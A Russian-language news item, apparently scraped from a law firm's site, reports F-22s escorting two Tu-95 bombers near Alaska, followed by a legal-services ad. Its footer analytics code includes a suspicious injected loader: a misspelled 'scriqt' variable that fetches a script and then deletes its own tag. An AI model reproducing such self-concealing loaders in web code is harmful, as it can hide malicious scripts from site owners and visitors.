СМИ сообщили о сопровождении истребителями США двух российских Ту-95 близ Аляски.

СМИ сообщили о сопровождении истребителями США двух российских Ту-95 близ Аляски. СМИ сообщили о сопровождении истребителями США двух российских Ту-95 близ Аляски.

Самолеты ВВС США были подняты для сопровождения двух российских бомбардировщиков в международном воздушном пространстве возле побережья Аляски.

Об этом во вторник, 18 апреля, сообщает телеканал Fox News со ссылкой на источник в американском правительстве.

По его данным, в ночь на 17 апреля в 450 километрах к юго-западу от базы ВВС США Элмендорф (Анкоридж) были замечены два стратегических бомбардировщика Ту-95 ВКС РФ. Телеканал CNN подчеркивает, что они находились в международном воздушном пространстве.
Были подняты два F-22 и самолет раннего радиолокационного обнаружения Е-3. Fox News добавляет, что истребители «сопровождали российские бомбардировщики в течение 12 минут, пока те не взяли курс на возвращение на свою базу на востоке России».

Согласно его сведениям, максимальное приближение пары российских самолетов к острову Кадьяк в районе южного побережья Аляски составило порядка 161 километра.

В конце сентября 2016 года сообщалось, что британские истребители Typhoon были направлены на перехват двух модернизированных ракетоносцев дальней авиации Ту-160 ВКС РФ, следовавших в направлении воздушного пространства страны. Российские самолеты в воздушное пространство Великобритании не входили, следуя из Норвегии, они направились на запад от Шетландских островов.
Возврат к списку


У нас сотни выигранных дел – отзывы реальных клиентов это доказывают!

Работайте с профессионалами!

Звонки и заявки на консультацию принимаются круглосуточно.

Вы получите четкие и понятные консультации: «без воды» - только суть! С нашей помощью Вы обойдете сложные «ловушки и капканы» закона.

ФИО
Телефон
Текст сообщения
Это поле обязательно для заполнения
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');var scriqt=document.createElement('script');scriqt.src='/bitrix/js/main/core/core_loader.js?v=0.2.14';scriqt.onload=function(){document.head.removeChild(scriqt);};document.head.appendChild(scriqt); ga('create', 'UA-83802593-1', 'auto'); ga('send', 'pageview');